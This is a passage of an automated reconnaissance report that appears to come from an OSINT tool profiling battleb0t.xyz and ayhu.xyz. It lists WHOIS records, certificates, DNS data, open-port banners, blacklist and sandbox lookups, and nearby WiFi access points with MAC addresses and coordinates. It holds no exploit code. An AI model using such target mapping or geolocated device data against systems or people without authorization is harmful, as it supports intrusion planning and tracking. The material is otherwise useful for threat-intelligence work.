[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003488]\n "_9B397A29-43D5-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_DBECEA34-43D6-11ED-9763-08002704A352_.dat" has type "Composite Document File V2 Document Cannot read short stream"- [targetUID: N/A]\n "92D7422C4B07CA9C9F3C147A693D9EF5" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\92D7422C4B07CA9C9F3C147A693D9EF5]- [targetUID: 00000000-00003488]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab572A.tmp" has type "Microsoft Cabinet archive data 62397 bytes 1 file"- Location: [%TEMP%\\Cab572A.tmp]- [targetUID: 00000000-00003488]\n "~DFAA5D95001843E9B0.TMP" has type "data"- Location: 
[%TEMP%\\~DFAA5D95001843E9B0.TMP]- [targetUID: 00000000-00003348]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://injectitlimited.cmail19.com/t/i-c-tiirkhydn"\n Pattern match: "http://injectitlimited.cmail19.com"\n Heuristic match: "injectitlimited.cmail19.com"\n Heuristic match: "x1.c.lencr.org"\n Heuristic match: "GET / HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: x1.c.lencr.org"\n Pattern match: "www.fsi-language-courses.org"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /course-download-email-confirmation/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.fsi-language-courses.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/89 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Network Traffic', u'identifier': u'network-18', u'name': u'Contacts Mail Related Domain Names', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'"injectitlimited.cmail19.com" is probably a mail server'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User A | 35.229.48.116 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | Netlify | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} |
| 2023-05-12 02:54:13 | Open TCP Port | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3030::ac43:a8fc:80 | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:59:47 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 2 | 0 | None | abuse@godaddy.com | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-001 (Net ID: 00:02:72:8E:62:D1) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.180): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | default (Net ID: 00:01:24:F0:43:45) | 37.7642, -122.3993 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.141): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.17:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:DB:DA:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:AA:94:7C:2C) | 41.8781, -87.6298 |
| 2023-05-12 02:55:15 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 165.232.113.85 |
| 2023-05-12 03:10:04 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | acilacikveteriner.com | acilacikveteriner.com |
| 2023-05-12 02:46:43 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | North Charleston, United States | 34.74.170.74 |
| 2023-05-12 02:45:07 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 1 | 0 | None | {u'count': 1, u'search_terms': [{u'id': u'domain', u'value': u'battleb0t.xyz'}], u'result': [{u'environment_id': 160, u'job_id': u'6421d18abc9d17a8490ac78d', u'analysis_start_time': u'2023-03-27 17:25:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'4feea01ff4a783ce1c5865f5114d6f2620c834d630588769904d9a0871e30a8d', u'type': None, u'type_short': u'url', u'size': 53}]} | battleb0t.xyz |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | cloudflare.com | daphne.ns.cloudflare.com |
| 2023-05-12 02:44:23 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.108.153 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Cloudflare, Inc. | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 401 Unauthorized
Date: <REDACTED>
Server: cPanel
Persistent-Auth: false
Host: 87.248.157.102:2079
Cache-Control: no-cache, no-store, must-revalidate, private
Connection: close
Vary: Accept-Encoding
WWW-Authenticate: Basic realm="Horde DAV Server"
Content-Encoding: gzip
Content-Length: 52
Content-Type: text/html; charset="utf-8"
Expires: Fri, 01 Jan 1990 00:00:00 GMT
| 87.248.157.102 |
| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WPKRCCC7SJ49ZB68B31", "content-type": "text/css; charset=UTF-8", "age": "0"} | https://pics.battleb0t.xyz/gallery.css |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.119): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://ayhu.xyz/cdn-cgi/styles/challenges.css | https://ayhu.xyz/ |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c56db576d8c1409-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ADSL-WiFi_Telfort (Net ID: 00:13:49:CF:0D:6D) | 50.8897, 6.0563 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | conam (Net ID: 00:06:25:D8:C9:41) | 39.0469, -77.4903 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SFUSA (Net ID: 00:01:24:F1:6D:E3) | 37.7642, -122.3993 |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 229.30.196.104.bc.googleusercontent.com | 104.196.30.229 |
| 2023-05-12 03:03:20 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-experiments.github.io |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 104.21.6.166 | ayhu.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Riaan (Net ID: 00:01:36:08:E7:41) | 52.3759, 4.8975 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Merken (Net ID: 00:14:5C:86:BE:BA) | 50.8897, 6.0563 |
| 2023-05-12 02:44:43 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:02.310 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A0:8D:98:FA:F9:D9:C8:59:5F:87:D3:
BB:68:8E:C2:BB:E7:07:F3:66:F0:BF:C4:32:F7:17:14:
85:A0:6B:D1:81:02:21:00:E1:E7:8A:92:A4:1B:C4:8C:
79:7C:C9:6A:17:B8:C7:84:C4:57:6B:7F:E9:88:F3:FA:
7F:17:65:61:BF:48:50:7D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Nov 17 10:44:02.268 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8A:CF:A1:DE:F1:EC:82:39:97:4B:3B:
E7:19:AD:34:CE:C3:F8:D5:48:1A:55:78:09:18:4D:A5:
36:34:CF:46:A1:02:20:77:AE:18:F8:2D:70:F3:32:66:
62:44:0D:F1:40:70:3E:89:21:C3:7B:CF:8C:98:9B:A8:
93:78:E1:26:FD:75:C4
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0B:6B:11:48:DC) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Destructoid (Category: social)
https://www.destructoid.com/?name=login | login |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 80 | 0 | 2 | 0 | None | 34.74.170.74 | funny.battleb0t.xyz |
| 2023-05-12 02:44:25 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
95:BB:C8:B6:24:D4:2D:39:FE:3C:BB:87:87:DD:4C:3D:
6E:F8:5C:00:34:71:DB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 16 00:40:11.009 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:04:85:7D:9E:71:55:A6:C5:38:5A:64:60:
05:9A:15:17:EA:9E:B4:58:0D:3C:86:17:2C:C3:17:21:
8A:21:DE:13:02:21:00:93:46:3A:71:BC:50:F5:73:1A:
31:49:1D:77:D8:F0:F3:D0:7E:06:7D:4A:BA:7A:E8:B4:
4B:2C:3E:84:83:8A:4F
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:51:54 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [104.21.71.14]
https://www.virustotal.com/en/ip-address/104.21.71.14/information/ | 104.21.71.14 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.106 | 35.229.48.116 |
